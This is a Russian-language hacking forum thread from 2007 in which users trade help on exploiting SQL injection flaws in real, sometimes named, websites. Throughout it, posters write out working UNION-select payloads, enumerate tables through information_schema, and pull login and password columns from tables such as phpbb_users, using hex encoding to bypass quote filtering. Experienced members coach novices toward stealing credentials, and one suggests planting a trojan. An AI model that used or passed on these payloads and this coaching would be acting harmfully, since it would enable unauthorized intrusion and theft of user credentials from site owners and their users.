RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-07 23:53:35.353333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Пристрелите их! Неужели так сложно, ПРЕЖДЕ чем зайти в этот топик, прочесть ХОТЯ БЫ ОДНУ статью про SQL-Инъекции?!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-08 12:24:46.533333
|
|
|
Toxic_gl
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-07 22:52:34.470000
|
У меня проблема есть сайт стоит на mysqli 5.0.45
на мой запрос dogs_list.php?group_id=-1/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/limit/**/120,1/*
Выводин название строк.
Но строки одмин или что то вроде не нашел а на запрос посмотреть содержимое любой колонке dogs_list.php?group_id=-1/**/union/**/select/**/1/**/from/**/1/*
не как не реагирует
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-08 23:25:18.653333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Ничего не понял, честно говоря.
select 1 from 1…
чего ты хотел этим добиться?
Не лучше ли выбрать username,user_password из таблицы forum_users? ;)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-09 14:19:53.443333
|
|
|
Toxic_gl
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-07 22:52:34.470000
|
Блин не выходит ((( в таблице forum_users только Anonymous а в поле user_password пусто ((( а что либо связанное с аdminom я не нашел. может кто подскажет где искать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-09 15:23:13.343333
|
|
|
SanyaGrek
Сообщений: 28
Оценки: 0
Присоединился: 2007-10-22 10:45:34.196666
|
quote:
У меня проблема есть сайт стоит на mysqli 5.0.45
на мой запрос dogs_list.php?group_id=-1/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/limit/**/120,1/*
Выводин название строк.
Но строки одмин или что то вроде не нашел а на запрос посмотреть содержимое любой колонке dogs_list.php?group_id=-1/**/union/**/select/**/1/**/from/**/1/*
не как не реагирует
тебе выводятся имена не столбцов, а таблиц (information_schema.tables)
попробуй union select column_name from information_schema.columns where table_name=[имя таблицы]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-09 15:55:41.253333
|
|
|
Toxic_gl
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-07 22:52:34.470000
|
Как мне найти админа в таблицах? я пересмотрел все заголовки их там около 120 и не где не встретил не слово о админе.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-09 18:22:54.300000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: Toxic_gl
Блин не выходит ((( в таблице forum_users только Anonymous а в поле user_password пусто ((( а что либо связанное с аdminom я не нашел. может кто подскажет где искать?
Баклан. Ты выбрал первую строчку из forum_users! А слабо в конце запроса дописывать
limit 0,1
limit 1,1
limit 2,1
и т.д., чтобы выбирать поочередно все строчки.
упоминания об администраторах сайта я там тоже не нашел, так что можешь забить на это
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-10 23:08:55.406666
|
|
|
hackers
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-10 19:20:30.156666
|
Здравствуйте!
Нашел на сайте скрипт реагирующий на команды:
было
test.php?id=3
при изменениях типа test.php?id=3' выдает:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/…/test.php on line 29
поставил
test.php?id=1<100 or 2000
изменения работают, ошибки нет.
Возможно как то этот запрос завершить и вывести какую нить таблицу или зделать команду для бекапа базы в определённую директорию (в наличии есть открытая на сайте!)?
Например:
test.php?id=1<100 or 2000 –; select ALL from users
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-10 23:10:21.250000
|
|
|
hackers
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-10 19:20:30.156666
|
Здравствуйте!
Нашел на сайте скрипт реагирующий на команды:
было
test.php?id=3
при изменениях типа test.php?id=3' выдает:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/.../test.php on line 29
поставил
test.php?id=1<100 or 2000
изменения работают, ошибки нет.
Возможно как то этот запрос завершить и вывести какую нить таблицу или зделать команду для бекапа базы в определённую директорию (в наличии есть открытая на сайте!)?
Например:
test.php?id=1<100 or 2000 --; select ALL from users
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-11 00:13:20.560000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Ты имеешь дело с mysql, поэтому
1)Используй в качестве комментария /*
2)Не получится разделять запросы через ;, вообще никак не получится. Нужно подбирать union, если хочешь узнать какие-нибудь данные
test.php?id=1+union+select+1,2,3,... (и в конце /*)
Пока не задолбаешься. как только ошибка исчезнет, изменяй 1 на -1 или на 1+and+1=0
Или за логарифм от количества столбцов в исходном запросе, через order by легко подобрать кол-во полей. За подробностями либо читай сначала эту тему, либо в гугл.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-11 15:32:12.186666
|
|
|
Taraseika
Сообщений: 98
Оценки: 0
Присоединился: 2007-09-07 19:32:59.486666
|
скажите пожалуста как найти эти SQL-инъекции
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-11 15:39:21.913333
|
|
|
hackers
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-10 19:20:30.156666
|
Какой то дурдом, чтот тут не то, перепробывал вот так:
test.php?id=-1+union+select+null,null…./* (до 20-30 штук писал… ошибка не исчезла)
и вот так:
test.php?id=/*union+select+null……/* (до 20-30 штук писал… ошибка не исчезла)
:@
p.s. Написал Пхп скрипт на cURL с перебором запросов… фтыкнул 200 null,null.. и 1,1,1… - всеравно выдает ошибку!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-11 19:07:06.463333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: hackers
и вот так:
test.php?id=/*union+select+null……/* (до 20-30 штук писал… ошибка не исчезла)
вот так явно незачем.
попробуй через order by подобрать кол-во полей.
quote:
ORIGINAL: Taraseika
скажите пожалуста как найти эти SQL-инъекции
Неужели ты думаешь хоть с минимальной вероятностью, что ты первый, кому в голову пришел этот вопрос? Нет! Тогда разумно будет обратиться к гуглу. Прям с таким запросом
TO ALL:
ОПОМНИТЕСЬ!!! Юзайте ПРЕЖДЕ гугл и мануалы, а уже если что-то совсем не получается, заходите в этот топик.
To hackers:
… Посмотрел ссылку, которую ты мне прислал. Да, там действительно sql-injection… Мне и в голову не могло прийти, что ты не посмотрел версию mysql, прежде чем пытаться подобрать union. Так вот: Версия 3. Кавычки фильтруются => никаких into outfile уже не допишешь. Занавес.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-12 23:59:33.800000
|
|
|
Alantoin
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-11 11:50:59.970000
|
У меня есть вопросик :)
вот я нащел сайт… в конце его скрипта который выдаёт пользавателей группы написал stat.php?sector=Moodle' вобшим выдало ошибку
sql error:
quote:
2007-11-12 22:56:55 /home/go.php
1064 syntax error near 'vtvpmc'
AND L.Status <> 'drop'
ORDER BY I.Step' at line 20
SELECT I.Theme, I.Item, LEFT(I.Item, POSITION('.' IN I.Item)-1) AS Media,
round((Factor * Points - Late)*SubPoints/100, 1) AS Points, S.Status, I.Status as IStatus,
I.MinPoints, NULL,
P.Login, CONCAT(P.LastName, ' ', P.FirstName, ' ', P.FatherName) AS Name,
P.LastName AS FIO,
P.SchoolName As Nr, NOW() < ADDDATE(StatDate, INTERVAL 16 HOUR) AS NowStat
FROM Item I
LEFT JOIN Stat S
ON S.Course = I.Course
AND S.Theme = I.Theme
AND S.Item = I.Item
JOIN Person P
ON P.Login = S.Login
JOIN Login L
ON L.Login = S.Login
WHERE I.Course = 'tinklai'
AND LEFT(I.Item, 5) IN ('test.', 'pasca', 'olimp', 'strik')
AND I.Step > 0
AND I.Status in ('next', 'open')
AND P.Sector = 'Moodle''
AND L.School = 'vtvpmc'
AND L.Status <> 'drop'
ORDER BY I.Step
что мне теперь добавлять чтоб дорбаться до юзеров ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-13 00:25:02.406666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
stat.php?sector=Moodle' and 1=0 union select 1,2,3…. /*
Если не ошибаюсь, то количество полей должно быть равно 13.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-13 12:15:03.516666
|
|
|
Toxic_gl
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-07 22:52:34.470000
|
народ кто подскажет где взять программку для перевода символов в char.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-13 14:01:56.450000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Самому написать :)
А вообще еще можно перевод в hex юзать. Пиши скрипт на php:
<?php
$string = '…';
echo "0x".bin2hex($string);
?>
и потом спокойно используй и в select, и в where. только в into outfile должны быть реальные кавычки и подобные трюки не прокатят.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-16 10:21:17.790000
|
|
|
fastnull
Сообщений: 11
Оценки: 0
Присоединился: 2007-05-06 16:08:34.880000
|
1
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-16 12:25:38.940000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Возможно, что в этой таблице просто нет никаких записей. Потому что вариант нехватки привилегий для доступа к ней менее вероятен (уязвимый скрипт работает в той же БД, где и таблица author)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-16 15:10:25.736666
|
|
|
MegaBits
Сообщений: 15
Оценки: 0
Присоединился: 2007-05-25 19:10:39.726666
|
http://shop.kalyany.ru/index.php?categoryID=-38+union+select+(USER()/* http://shop.kalyany.ru/index.php?categoryID=38' Подобрал кол-во столбцёв, их там аж 1, но вот инфа не отображаеться почему?
http://shop.fans.com.ua/index.php?productID=8' а здесь с помощью ордер бай не подбираеться.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-16 17:34:30.066666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: MegaBits
http://shop.kalyany.ru/index.php?categoryID=-38+union+select+(USER()/* Подобрал кол-во столбцёв, их там аж 1, но вот инфа не отображаеться почему?
Там что-то хитрое. По-моему не получится корректно построить union. Используй char brute, если хочешь выбрать что-то конкретное, например данные форума Invision Power Board ;)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-17 01:02:01.886666
|
|
|
MegaBits
Сообщений: 15
Оценки: 0
Присоединился: 2007-05-25 19:10:39.726666
|
to Dimonelite
А поподробнее про char brute можешь рассказать или сылку дать.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-17 16:34:33.236666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: MegaBits
to Dimonelite
А поподробнее про char brute можешь рассказать или сылку дать.
У нас уже ввели запрет на посылание в гугл? Если нет, то берегись ;)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-17 19:55:47.606666
|
|
|
timoxasev
Сообщений: 4
Оценки: 0
Присоединился: 2007-11-15 02:53:49.040000
|
Блин застрял, не могу сопоставить названия таблиц и колонок для запросов….:@
С помощью запроса
index.php?GRID=33&CID=104&ID=99999+union+select+1,2,3,Column_name,5,6,7,8,9+from+information_schema.columns
получил следeдующие названия колонок, с помощью:
index.php?GRID=33&CID=104&ID=99999+union+select+1,2,3,Table_name,5,6,7,8,9+from+information_schema.tables
получил след названия таблиц (все писать не буду, возьму самые на мой взгляд интересные):
Названия таблиц: Столбцы
CHARACTER_SETS DEFAULT_COLLATE_NAME
COLLATIONS DESCRIPTION
COLLATION_CHARACTER_SET_APPLICABILITY MAXLEN
COLUMNS COLLATION_NAME
COLUMN_PRIVILEGES ID
KEY_COLUMN_USAGE IS_DEFAULT
PROFILING INDEX_NAME
ROUTINES SEQ_IN_INDEX
SCHEMATA COLLATION
SCHEMA_PRIVILEGES CARDINALITY
STATISTICS SUB_PART
TABLES PACKED
TABLE_CONSTRAINTS NULLABLE
TABLE_PRIVILEGES INDEX_TYPE
TRIGGERS COMMENT
USER_PRIVILEGES TABLE_TYPE
VIEWS ENGINE
Categories VERSION
GoodsList ROW_FORMAT
Groups TABLE_ROWS
OrderedCarts AVG_ROW_LENGTH
Orders DATA_LENGTH
cpg11d_albums MAX_DATA_LENGTH
cpg11d_banned INDEX_LENGTH
cpg11d_categories DATA_FREE
cpg11d_comments AUTO_INCREMENT
cpg11d_config CREATE_TIME
cpg11d_pictures UPDATE_TIME
cpg11d_usergroups CHECK_TIME
cpg11d_users TABLE_COLLATION
cpg11d_votes CHECKSUM
phpbb_auth_access CREATE_OPTIONS
phpbb_banlist TABLE_COMMENT
phpbb_categories CONSTRAINT_TYPE
phpbb_config TRIGGER_CATALOG
phpbb_confirm TRIGGER_SCHEMA
phpbb_disallow TRIGGER_NAM
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_sessions
phpbb_sessions_keys
phpbb_themes_name
phpbb_user_group
phpbb_users
phpbb_words
GroupsMan
Теперь пытаюсь подставлять оба значения в один запрос, перебирая по очереди:
index.php?GRID=33&CID=104&ID=99999+union+select+1,2,3,INDEX_NAME,5,6,7,8,9+from+phpbb_user_group/* ????
Какие комбинации не пробую - один фиг ошибка:
Unknown column 'INDEX_NAME' in 'field list'
:@:@:@:@ Подскажите че делаю не так ???:@:@:@:@:@[:(]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-18 09:34:01.546666
|
|
|
timoxasev
Сообщений: 4
Оценки: 0
Присоединился: 2007-11-15 02:53:49.040000
|
Чему всегда поражаюсь на таких сайтах, так это, либо обилию постов с насмешками и посылами в гугл, который меня сюда и привел, либо полной тишине:(
+union+select+full_shit,full_shit,full_shit,full_shit,/*
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-18 11:55:49.153333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Ты считаешь себя очень умным? Значит в гугл тебя посылать нельзя? А ты ХОТЬ ЧТО-НИБУДЬ знаешь по этой теме?
что тебе мешает писать select concat(table_name,char(124),column_name) from information_schema.columns? До этого никак нельзя было додуматься, нет? И в гугле пошарить тоже никак, да? И ты все еще считаешь себя самым умным, а никто на форуме ничего не знают, и только и умеют, что незаслуженно посылать таких, как ты, в гугл?
P.S.
select column_name from information_schema.columns
так ты выбрал названия ВСЕХ колонок от ВСЕХ таблиц. И почему ВСЕ эти колонки должны присутствовать в phpbb_users?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-21 21:04:17.390000
|
|
|
ProNick
Сообщений: 16
Оценки: 0
Присоединился: 2007-11-21 20:35:17.220000
|
Кто нибудь поможет с взломом форума на базе YabbSE 1.5.5. ?
SQL инъекция в параметре '$postid' в функции ModifyMessage2: postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/* :@
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 00:26:57.050000
|
|
|
joker$
Сообщений: 102
Оценки: 0
Присоединился: 2007-03-09 17:07:42.703333
|
у меня такая трабла
когда php?id=394'….то выдает одну ошибку Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in…………, а когда php?id=394+order+by+1/* то никаких ошибок
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 00:41:43.790000
|
|
|
PROPHET07
Сообщений: 79
Оценки: 0
Присоединился: 2007-08-11 00:12:57.956666
|
попробуй
php?id=-1+……
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 00:51:39.413333
|
|
|
joker$
Сообщений: 102
Оценки: 0
Присоединился: 2007-03-09 17:07:42.703333
|
вот я нашел как php?id=394'+order+by+8/*
потом -394+union+select+1,2,3,4,5,6,7,8/* и нету цифр куда выводить инфу…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 10:37:56.146666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Ты сам себе противоречишь, order by ты подбирал, закрывая кавычкой 394, а строя конструкцию с union, уже забыл про кавычку.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 15:37:12.176666
|
|
|
joker$
Сообщений: 102
Оценки: 0
Присоединился: 2007-03-09 17:07:42.703333
|
А ты думаешь я не пробывал! Это скорее всего blind inj !?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 19:00:07.396666
|
|
|
snusmumrik
Сообщений: 1
Оценки: 0
Присоединился: 2007-12-03 17:56:51.800000
|
блин, ситуёвина - напал на один сайт на котором стоит фильтрация по букве. тоесть ввожу в адресную строку +union+select+111,concat(login,char(58),password)+from+users+limit+0,1/* - на выходе инфа - "Unknown column 'assword' in 'field list'". пробовал вводить используя аски, хекс. не помогает. вопрос: возможно ли обратиться к колонке не явно, не по имени и получить адекватній результат в виде значения а не просто слова password?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 20:47:27.293333
|
|
|
PROPHET07
Сообщений: 79
Оценки: 0
Присоединился: 2007-08-11 00:12:57.956666
|
попробуй
+union+select+111,concat(login,char(58),password)+from+users+where+column_name=0x70617373776f7264 ……..
0x70617373776f7264 - password
както так, хотя может я и ошибаюсь….:D
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 23:06:53.243333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: joker$
А ты думаешь я не пробывал! Это скорее всего blind inj !?
По предоставленной тобой информации я не смог полностью осознать, какая у тебя проблема, и что ты сделал для ее решения. Хочешь конкретной помощи - давай конкретную ссылку на уязвимый скрипт.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-04 22:26:59.523333
|
|
|
ZloiJoker
Сообщений: 8
Оценки: 0
Присоединился: 2005-06-16 22:37:23
|
Есть скрипт позволяющий делать SQL inject, никаких ограничений USER() выдал что сижу под root@localhost.
Вопрос как то можно выяснить какие бд присутсвую в mysql. ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-05 15:46:29.590000
|
|
|
vxcg
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-09 09:14:45.873333
|
8| Помогите пожалуйста. Вот сайт www.berezovka.clan.su . Не знаю что делать? Написан на чём хер его знает, пришёл к выводу что на конструкторском сайте каком-то. Админка www.berezovka.clan.su\admin Просканировал Xspider-ом выплинул какин-то ошибки, чё то c openSSH, куки нашёл, но нечего. Покажите мне ламеру из ламеров что делать в таком случае? Можно ли провести сдесь sql-inj или чё-то другое можно сделать.А?[sm=bc.gif]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-05 16:22:46.880000
|
|
|
PROPHET07
Сообщений: 79
Оценки: 0
Присоединился: 2007-08-11 00:12:57.956666
|
сразу видно что ты даже не понимаешь что такое sql-inj ….
поповоду сайта - он на укозе, двиг там хороший и админы не спящие…. имхо кроме как пихнуть троя и получить пасс врятли что получится……
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-05 16:31:20.753333
|
|
|
ZloiJoker
Сообщений: 8
Оценки: 0
Присоединился: 2005-06-16 22:37:23
|
Может всетаки имеет смысл создать по моей теме отдельный топик ? (а то бардак какой то)
Вообще как то можно через SQL injecting mysql узнать какие там db т.е show databases;
Речь идет про 4 ку и Table 'information_schema.TABLES' doesn't exist
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-05 18:34:25.430000
|
|
|
founder
Сообщений: 4
Оценки: 0
Присоединился: 2007-12-05 18:10:47.093333
|
Eсть урл вида ?id=1
Такая вещь на него не действует ?id=1', но действуте такая ?id=2-1, отображается то же что и при ?id=1. Все попытки узнать количество полей таким образом ?id=1+union+select+1,2,3,4,5,6… ?id=-1+union+select+1,2,3,4,5,6, увенчались тем, что отображается пустая страница. Это говорит о том, что хоть ?id=2-1 не проверяется, но применить иньекцию нельзя?
Пробывал и через ?id=1+order+by+50, то же пустая страница и никаких ошибок…, я понимаю, что если ошибка не отоборажается это ещё не значит, что её нет, но что можно ещё попробывать не знаю.
Может есть какие-нибудь соображения?
|
|
|
|
|
|
